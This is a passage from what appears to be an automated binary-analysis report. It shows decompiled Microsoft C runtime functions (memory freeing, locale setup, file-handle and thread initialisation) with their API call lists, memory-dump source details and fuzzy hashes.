                                        				_t5 = E010632B6( *0x10bfcf0);
                                        				_t27 = _t26 | 0xffffffff;
                                        				 *0x10bfcf4 = 0;
                                        				 *0x10bfcf0 = 0;
                                        				if(_t24 != _t27 &&  *0x10c1b34 != 0) {
                                        					_t5 = E010632B6(_t24);
                                        				}
                                        				__imp__EncodePointer(_t27);
                                        				 *0x10c1b34 = _t5;
                                        				_t6 =  *0x10c06f4;
                                        				if( *0x10c06f4 != 0) {
                                        					E010632B6(_t6);
                                        					 *0x10c06f4 = 0;
                                        				}
                                        				_t7 =  *0x10c06f8;
                                        				if( *0x10c06f8 != 0) {
                                        					E010632B6(_t7);
                                        					 *0x10c06f8 = 0;
                                        				}
                                        				_t8 =  *0x107e7d4; // 0x107e5b0
                                        				asm("lock xadd [eax], esi");
                                        				if(_t27 == 1) {
                                        					_t8 =  *0x107e7d4; // 0x107e5b0
                                        					if(_t8 != 0x107e5b0) {
                                        						_t9 = E010632B6(_t8);
                                        						 *0x107e7d4 = 0x107e5b0;
                                        						return _t9;
                                        					}
                                        				}
                                        				return _t8;
                                        			}












                                        APIs
                                        • DecodePointer.KERNEL32 ref: 01061984
                                        • _free.LIBCMT ref: 0106199D
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • _free.LIBCMT ref: 010619B0
                                        • _free.LIBCMT ref: 010619CE
                                        • _free.LIBCMT ref: 010619E0
                                        • _free.LIBCMT ref: 010619F1
                                        • _free.LIBCMT ref: 010619FC
                                        • _free.LIBCMT ref: 01061A20
                                        • EncodePointer.KERNEL32(00000000), ref: 01061A27
                                        • _free.LIBCMT ref: 01061A3C
                                        • _free.LIBCMT ref: 01061A52
                                        • _free.LIBCMT ref: 01061A7A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 3064303923-0
                                        • Opcode ID: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction ID: a17bde0e0b59de6b1cfcdf2f924f9eeba8bb176dc4785910cc9ca4401e96ef6d
                                        • Opcode Fuzzy Hash: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction Fuzzy Hash: 8F217E71D021538FD7719F58F9C0989BBE9BB4472032500AAEDD8A734DDE3A4884CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E01068F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                        				signed int _v8;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				signed int _v40;
                                        				void* _t38;
                                        				signed int _t45;
                                        				signed int _t60;
                                        				intOrPtr _t77;
                                        				void* _t80;
                                        				intOrPtr* _t82;
                                        				signed int _t83;
                                        				signed int _t86;
                                        				intOrPtr _t88;
                                        				void* _t92;
                                        
                                        				_t80 = __edx;
                                        				_push(__ebx);
                                        				_push(__esi);
                                        				_t86 = 0;
                                        				if(_a12 <= 0) {
                                        					L5:
                                        					return _t38;
                                        				} else {
                                        					_push(__edi);
                                        					_t82 =  &_a12;
                                        					while(1) {
                                        						_t82 = _t82 + 4;
                                        						_t38 = E0106551B(_a4, _a8,  *_t82);
                                        						_t92 = _t92 + 0xc;
                                        						if(_t38 != 0) {
                                        							break;
                                        						}
                                        						_t86 = _t86 + 1;
                                        						if(_t86 < _a12) {
                                        							continue;
                                        						} else {
                                        							goto L5;
                                        						}
                                        						goto L20;
                                        					}
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					E01064112(0, _t80);
                                        					asm("int3");
                                        					_push(0x14);
                                        					_push(0x107cf88);
                                        					E010627F0(0, _t82, _t86);
                                        					_t66 = 0;
                                        					_v32 = 0;
                                        					__eflags = _a4 - 5;
                                        					if(__eflags <= 0) {
                                        						_t88 = E010615FE();
                                        						_v36 = _t88;
                                        						E010636DB(0, _t80, _t82, _t88, __eflags);
                                        						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                        						_v8 = _v8 & 0;
                                        						_t83 = E010632EE(0xb8, 1);
                                        						_v40 = _t83;
                                        						__eflags = _t83;
                                        						if(_t83 != 0) {
                                        							E01063117(0xc);
                                        							_v8 = 1;
                                        							E0106899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                        							_v8 = _v8 & 0x00000000;
                                        							E010690D1();
                                        							_t66 = E01069285(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                        							_v32 = _t66;
                                        							__eflags = _t66;
                                        							if(_t66 == 0) {
                                        								E0106363B(_t83);
                                        								_t43 = E010634E1(_t83);
                                        							} else {
                                        								__eflags = _a8;
                                        								if(_a8 != 0) {
                                        									_t60 = E0106DB06(_a8, 0x107e17c);
                                        									__eflags = _t60;
                                        									if(_t60 != 0) {
                                        										 *0x10c0a44 = 1;
                                        									}
                                        								}
                                        								E01063117(0xc);
                                        								_v8 = 2;
                                        								_t25 = _t88 + 0x6c; // 0x6c
                                        								E0106375B(_t25, _t83);
                                        								E0106363B(_t83);
                                        								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                        								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                        									__eflags =  *0x107ecf4 & 0x00000001;
                                        									if(( *0x107ecf4 & 0x00000001) == 0) {
                                        										E0106375B(0x107e2e4,  *((intOrPtr*)(_t88 + 0x6c)));
                                        										_t77 =  *0x107e2e4; // 0x107e2e8
                                        										_t32 = _t77 + 0x84; // 0x107ed00
                                        										 *0x107ecf8 =  *_t32;
                                        										_t33 = _t77 + 0x90; // 0x1079570
                                        										 *0x107ed54 =  *_t33;
                                        										_t34 = _t77 + 0x74; // 0x1
                                        										 *0x107e178 =  *_t34;
                                        									}
                                        								}
                                        								_v8 = _v8 & 0x00000000;
                                        								_t43 = E010690E0();
                                        							}
                                        						}
                                        						_v8 = 0xfffffffe;
                                        						E01069113(_t43, _t88);
                                        						_t45 = _t66;
                                        					} else {
                                        						 *((intOrPtr*)(E01064196(__eflags))) = 0x16;
                                        						E010640E7();
                                        						_t45 = 0;
                                        					}
                                        					return E01062835(_t45);
                                        				}
                                        				L20:
                                        			}


















                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-0
                                        • Opcode ID: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction ID: 7e6ceb9876812edad1a307fdf46b70e193b28217f6050780d6eb8bdb4e589736
                                        • Opcode Fuzzy Hash: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction Fuzzy Hash: 9D41E632904306EFEB20AFA8D941BDD7BF9BF14314F10846EFA98AB181DB765541CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E010617CB(void* __edx, char* _a4, short* _a8) {
                                        				int _v8;
                                        				void* __ecx;
                                        				intOrPtr* _t7;
                                        				intOrPtr _t9;
                                        				short* _t10;
                                        				short* _t12;
                                        				short* _t14;
                                        				int _t15;
                                        				short* _t22;
                                        				int _t24;
                                        				void* _t27;
                                        				void* _t31;
                                        				short* _t33;
                                        				intOrPtr _t34;
                                        
                                        				_t31 = __edx;
                                        				_push(_t27);
                                        				_t24 = 0;
                                        				_t36 = _a4;
                                        				if(_a4 != 0) {
                                        					_t33 = _a8;
                                        					__eflags = _t33;
                                        					if(__eflags == 0) {
                                        						goto L1;
                                        					}
                                        					_t10 = E01062D64(_t27);
                                        					__eflags = _t10;
                                        					if(_t10 == 0) {
                                        						_t22 = AreFileApisANSI();
                                        						__eflags = _t22;
                                        						if(_t22 == 0) {
                                        							_t24 = 1;
                                        							__eflags = 1;
                                        						}
                                        					}
                                        					 *_t33 = 0;
                                        					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
                                        					_v8 = _t12;
                                        					__eflags = _t12;
                                        					if(_t12 != 0) {
                                        						_t14 = E01063336(_t31, _t12 + _t12);
                                        						 *_t33 = _t14;
                                        						__eflags = _t14;
                                        						if(_t14 == 0) {
                                        							goto L9;
                                        						}
                                        						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
                                        						__eflags = _t15;
                                        						if(_t15 != 0) {
                                        							_t9 = 1;
                                        							__eflags = 1;
                                        							goto L14;
                                        						}
                                        						E01064175(GetLastError());
                                        						E010632B6( *_t33);
                                        						 *_t33 =  *_t33 & 0x00000000;
                                        						goto L8;
                                        					} else {
                                        						E01064175(GetLastError());
                                        						L8:
                                        						L9:
                                        						_t9 = 0;
                                        						L14:
                                        						return _t9;
                                        					}
                                        				}
                                        				L1:
                                        				_t7 = E01064196(_t36);
                                        				_t34 = 0x16;
                                        				 *_t7 = _t34;
                                        				E010640E7();
                                        				_t9 = _t34;
                                        				goto L14;
                                        			}


















                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 010617F5
                                        • AreFileApisANSI.KERNEL32 ref: 010617FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061818
                                        • GetLastError.KERNEL32 ref: 01061825
                                        • __dosmaperr.LIBCMT ref: 0106182C
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        • Opcode ID: 2ec84b278c6ac57fc3da53dbe8e5e9c64163e580e26632720a2e90e09d000fcf
                                        • Instruction ID: d2bf931f15f0fea34c8563e5625d018a8aa35bb41f1268d121ebd0bfd51566b2
                                        • Opcode Fuzzy Hash: 2ec84b278c6ac57fc3da53dbe8e5e9c64163e580e26632720a2e90e09d000fcf
                                        • Instruction Fuzzy Hash: 71110DB1A04206FFEB726FB49C48A7E7BECEF54661B208569F9D5D5181EB35C800C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E01061DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int* _t82;
                                        				signed int _t86;
                                        				long _t90;
                                        				void* _t91;
                                        				intOrPtr _t94;
                                        				signed int _t98;
                                        				signed int _t99;
                                        				signed char _t103;
                                        				void** _t105;
                                        				void** _t106;
                                        				void** _t109;
                                        				signed char _t111;
                                        				long _t119;
                                        				void* _t129;
                                        				signed int* _t133;
                                        				void* _t135;
                                        				signed int* _t138;
                                        				void** _t139;
                                        				void* _t141;
                                        				signed int _t142;
                                        				signed int _t143;
                                        				void** _t147;
                                        				signed int _t149;
                                        				void* _t150;
                                        				void** _t154;
                                        				void* _t155;
                                        				void* _t156;
                                        
                                        				_push(0x64);
                                        				_push(0x107cd50);
                                        				E010627F0(__ebx, __edi, __esi);
                                        				E01063117(0xb);
                                        				 *(_t155 - 4) = 0;
                                        				_push(0x40);
                                        				_t141 = 0x20;
                                        				_push(_t141);
                                        				_t82 = E010632EE();
                                        				_t133 = _t82;
                                        				 *(_t155 - 0x24) = _t133;
                                        				if(_t133 != 0) {
                                        					 *0x10bfd20 = _t82;
                                        					 *0x10c1b28 = _t141;
                                        					while(_t133 <  &(_t82[0x200])) {
                                        						_t133[1] = 0xa00;
                                        						 *_t133 =  *_t133 | 0xffffffff;
                                        						_t133[2] = 0;
                                        						_t133[9] = _t133[9] & 0x00000080;
                                        						_t133[9] = _t133[9] & 0x0000007f;
                                        						_t133[9] = 0xa0a;
                                        						_t133[0xe] = 0;
                                        						_t133[0xd] = 0;
                                        						_t133 =  &(_t133[0x10]);
                                        						 *(_t155 - 0x24) = _t133;
                                        						_t82 =  *0x10bfd20; // 0x0
                                        					}
                                        					GetStartupInfoW(_t155 - 0x74);
                                        					if( *((short*)(_t155 - 0x42)) == 0) {
                                        						L27:
                                        						_t129 = 0xfffffffe;
                                        						L28:
                                        						_t142 = 0;
                                        						while(1) {
                                        							 *(_t155 - 0x2c) = _t142;
                                        							if(_t142 >= 3) {
                                        								break;
                                        							}
                                        							_t147 =  *0x10bfd20 + (_t142 << 6);
                                        							 *(_t155 - 0x24) = _t147;
                                        							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
                                        								_t147[1] = 0x81;
                                        								if(_t142 != 0) {
                                        									_t65 = _t142 - 1; // -1
                                        									asm("sbb eax, eax");
                                        									_t90 =  ~_t65 + 0xfffffff5;
                                        								} else {
                                        									_t90 = 0xfffffff6;
                                        								}
                                        								_t91 = GetStdHandle(_t90);
                                        								 *(_t155 - 0x1c) = _t91;
                                        								if(_t91 == 0xffffffff || _t91 == 0) {
                                        									L45:
                                        									_t147[1] = _t147[1] | 0x00000040;
                                        									 *_t147 = _t129;
                                        									_t94 =  *0x10c1a80;
                                        									if(_t94 != 0) {
                                        										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
                                        									}
                                        									goto L47;
                                        								} else {
                                        									_t98 = GetFileType(_t91);
                                        									if(_t98 == 0) {
                                        										goto L45;
                                        									}
                                        									 *_t147 =  *(_t155 - 0x1c);
                                        									_t99 = _t98 & 0x000000ff;
                                        									if(_t99 != 2) {
                                        										if(_t99 != 3) {
                                        											L44:
                                        											_t71 =  &(_t147[3]); // -17562900
                                        											E01062D36(_t71, 0xfa0, 0);
                                        											_t156 = _t156 + 0xc;
                                        											_t147[2] = _t147[2] + 1;
                                        											goto L47;
                                        										}
                                        										_t103 = _t147[1] | 0x00000008;
                                        										L43:
                                        										_t147[1] = _t103;
                                        										goto L44;
                                        									}
                                        									_t103 = _t147[1] | 0x00000040;
                                        									goto L43;
                                        								}
                                        							} else {
                                        								_t147[1] = _t147[1] | 0x00000080;
                                        								L47:
                                        								_t142 = _t142 + 1;
                                        								continue;
                                        							}
                                        						}
                                        						 *(_t155 - 4) = _t129;
                                        						E0106207A();
                                        						_t86 = 0;
                                        						L49:
                                        						return E01062835(_t86);
                                        					}
                                        					_t105 =  *(_t155 - 0x40);
                                        					if(_t105 == 0) {
                                        						goto L27;
                                        					}
                                        					_t135 =  *_t105;
                                        					 *(_t155 - 0x1c) = _t135;
                                        					_t106 =  &(_t105[1]);
                                        					 *(_t155 - 0x28) = _t106;
                                        					 *(_t155 - 0x20) = _t106 + _t135;
                                        					if(_t135 >= 0x800) {
                                        						_t135 = 0x800;
                                        						 *(_t155 - 0x1c) = 0x800;
                                        					}
                                        					_t149 = 1;
                                        					 *(_t155 - 0x30) = 1;
                                        					while( *0x10c1b28 < _t135) {
                                        						_t138 = E010632EE(_t141, 0x40);
                                        						 *(_t155 - 0x24) = _t138;
                                        						if(_t138 != 0) {
                                        							0x10bfd20[_t149] = _t138;
                                        							 *0x10c1b28 =  *0x10c1b28 + _t141;
                                        							while(_t138 <  &(0x10bfd20[_t149][0x200])) {
                                        								_t138[1] = 0xa00;
                                        								 *_t138 =  *_t138 | 0xffffffff;
                                        								_t138[2] = 0;
                                        								_t138[9] = _t138[9] & 0x00000080;
                                        								_t138[9] = 0xa0a;
                                        								_t138[0xe] = 0;
                                        								_t138[0xd] = 0;
                                        								_t138 =  &(_t138[0x10]);
                                        								 *(_t155 - 0x24) = _t138;
                                        							}
                                        							_t149 = _t149 + 1;
                                        							 *(_t155 - 0x30) = _t149;
                                        							_t135 =  *(_t155 - 0x1c);
                                        							continue;
                                        						}
                                        						_t135 =  *0x10c1b28;
                                        						 *(_t155 - 0x1c) = _t135;
                                        						break;
                                        					}
                                        					_t143 = 0;
                                        					 *(_t155 - 0x2c) = 0;
                                        					_t129 = 0xfffffffe;
                                        					_t109 =  *(_t155 - 0x28);
                                        					_t139 =  *(_t155 - 0x20);
                                        					while(_t143 < _t135) {
                                        						_t150 =  *_t139;
                                        						if(_t150 == 0xffffffff || _t150 == _t129) {
                                        							L22:
                                        							_t143 = _t143 + 1;
                                        							 *(_t155 - 0x2c) = _t143;
                                        							_t109 =  &(( *(_t155 - 0x28))[0]);
                                        							 *(_t155 - 0x28) = _t109;
                                        							_t139 =  &(_t139[1]);
                                        							 *(_t155 - 0x20) = _t139;
                                        							continue;
                                        						} else {
                                        							_t111 =  *_t109;
                                        							if((_t111 & 0x00000001) == 0) {
                                        								goto L22;
                                        							}
                                        							if((_t111 & 0x00000008) != 0) {
                                        								L20:
                                        								_t154 = 0x10bfd20[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                        								 *(_t155 - 0x24) = _t154;
                                        								 *_t154 =  *_t139;
                                        								_t154[1] =  *( *(_t155 - 0x28));
                                        								_t37 =  &(_t154[3]); // 0xd
                                        								E01062D36(_t37, 0xfa0, 0);
                                        								_t156 = _t156 + 0xc;
                                        								_t154[2] = _t154[2] + 1;
                                        								_t139 =  *(_t155 - 0x20);
                                        								L21:
                                        								_t135 =  *(_t155 - 0x1c);
                                        								goto L22;
                                        							}
                                        							_t119 = GetFileType(_t150);
                                        							_t139 =  *(_t155 - 0x20);
                                        							if(_t119 == 0) {
                                        								goto L21;
                                        							}
                                        							goto L20;
                                        						}
                                        					}
                                        					goto L28;
                                        				}
                                        				_t86 = E01064E90(_t155, 0x107ece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                        				goto L49;
                                        			}

                                        APIs
                                        • __lock.LIBCMT ref: 01061DDD
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • __calloc_crt.LIBCMT ref: 01061DEE
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 01061E09
                                        • GetStartupInfoW.KERNEL32(?,0107CD50,00000064,01061146,0107CCC0,00000014), ref: 01061E62
                                        • __calloc_crt.LIBCMT ref: 01061EAD
                                        • GetFileType.KERNEL32(00000001), ref: 01061EF6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction ID: 4220f4b57403b46eff6df1509059b8c0391ed9c9b4e7ec4f1c3e11ebc24afd61
                                        • Opcode Fuzzy Hash: 36c2fdaf9870043b049a5cb3fd7ac8ee2265f785c8b575b642751e71ff3f11b7
                                        • Instruction Fuzzy Hash: 1F81B371D04246CFDB24CF68C8405ADBBF9BF59320B2442AEE4E6AB391D7399802CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E01061738(void* __ebx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				void* _t3;
                                        				intOrPtr _t6;
                                        				long _t14;
                                        				long* _t27;
                                        
                                        				E01061BC7(_t3);
                                        				if(E01063268() != 0) {
                                        					_t6 = E01062BEF(E01061493);
                                        					 *0x107e000 = _t6;
                                        					__eflags = _t6 - 0xffffffff;
                                        					if(_t6 == 0xffffffff) {
                                        						goto L1;
                                        					} else {
                                        						_t27 = E010632EE(1, 0x3bc);
                                        						__eflags = _t27;
                                        						if(_t27 == 0) {
                                        							L6:
                                        							E010617AE();
                                        							__eflags = 0;
                                        							return 0;
                                        						} else {
                                        							__eflags = E01062C4B( *0x107e000, _t27);
                                        							if(__eflags == 0) {
                                        								goto L6;
                                        							} else {
                                        								_push(0);
                                        								_push(_t27);
                                        								E01061685(__ebx, __edi, _t27, __eflags);
                                        								_t14 = GetCurrentThreadId();
                                        								_t27[1] = _t27[1] | 0xffffffff;
                                        								 *_t27 = _t14;
                                        								__eflags = 1;
                                        								return 1;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					E010617AE();
                                        					return 0;
                                        				}
                                        			}

                                        APIs
                                        • __init_pointers.LIBCMT ref: 01061738
                                          • Part of subcall function 01061BC7: EncodePointer.KERNEL32(00000000,?,0106173D,0106112C,0107CCC0,00000014), ref: 01061BCA
                                          • Part of subcall function 01061BC7: __initp_misc_winsig.LIBCMT ref: 01061BE5
                                          • Part of subcall function 01061BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01062DAE
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01062DC2
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01062DD5
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01062DE8
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01062DFB
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01062E0E
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01062E21
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01062E34
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01062E47
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01062E5A
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01062E6D
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01062E80
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01062E93
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01062EA6
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01062EB9
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01062ECC
                                        • __mtinitlocks.LIBCMT ref: 0106173D
                                        • __mtterm.LIBCMT ref: 01061746
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 01063182
                                          • Part of subcall function 010617AE: _free.LIBCMT ref: 01063189
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(0107E058,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 010631AB
                                        • __calloc_crt.LIBCMT ref: 0106176B
                                        • __initptd.LIBCMT ref: 0106178D
                                        • GetCurrentThreadId.KERNEL32(0106112C,0107CCC0,00000014), ref: 01061794
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 3567560977-0
                                        • Opcode ID: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction ID: 11304d4fe9ea5885aab4587ac3a0492065e43b777ef5c1896b8c4a878036415c
                                        • Opcode Fuzzy Hash: 9e2eaf8b389d5b6a00a515416af27ac503c4318ef5a1b4ee7ace770e4f7a4317
                                        • Instruction Fuzzy Hash: ADF09032A197131DF2757A79BC0A7CE2AECBF92630B204A6AF4D4D90C4FF3984418294
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0106879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t10;
                                        				signed int _t12;
                                        				intOrPtr* _t16;
                                        				intOrPtr* _t31;
                                        				void* _t32;
                                        
                                        				_push(8);
                                        				_push(0x107cf60);
                                        				_t10 = E010627F0(__ebx, __edi, __esi);
                                        				_t31 =  *((intOrPtr*)(_t32 + 8));
                                        				if(_t31 != 0) {
                                        					_t12 = E01063117(0xd);
                                        					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                        					if( *((intOrPtr*)(_t31 + 4)) != 0) {
                                        						asm("lock xadd [ecx], eax");
                                        						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x107e5b0) {
                                        							E010632B6( *((intOrPtr*)(_t31 + 4)));
                                        						}
                                        					}
                                        					 *(_t32 - 4) = 0xfffffffe;
                                        					E01068DC1();
                                        					if( *_t31 != 0) {
                                        						E01063117(0xc);
                                        						 *(_t32 - 4) = 1;
                                        						E0106363B( *_t31);
                                        						_t16 =  *_t31;
                                        						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x107e2e8) {
                                        							E010634E1(_t16);
                                        						}
                                        						 *(_t32 - 4) = 0xfffffffe;
                                        						E01068DCD();
                                        					}
                                        					_t10 = E010632B6(_t31);
                                        				}
                                        				return E01062835(_t10);
                                        			}









                                        APIs
                                        • __lock.LIBCMT ref: 01068D38
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • _free.LIBCMT ref: 01068D5E
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • __lock.LIBCMT ref: 01068D77
                                        • ___removelocaleref.LIBCMT ref: 01068D86
                                        • ___freetlocinfo.LIBCMT ref: 01068D9F
                                        • _free.LIBCMT ref: 01068DB2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        • Opcode ID: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction ID: 205b0c7eafba4a618c5dd71e5056d29ef6abffd32cd48716cb0339ad8747cd66
                                        • Opcode Fuzzy Hash: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
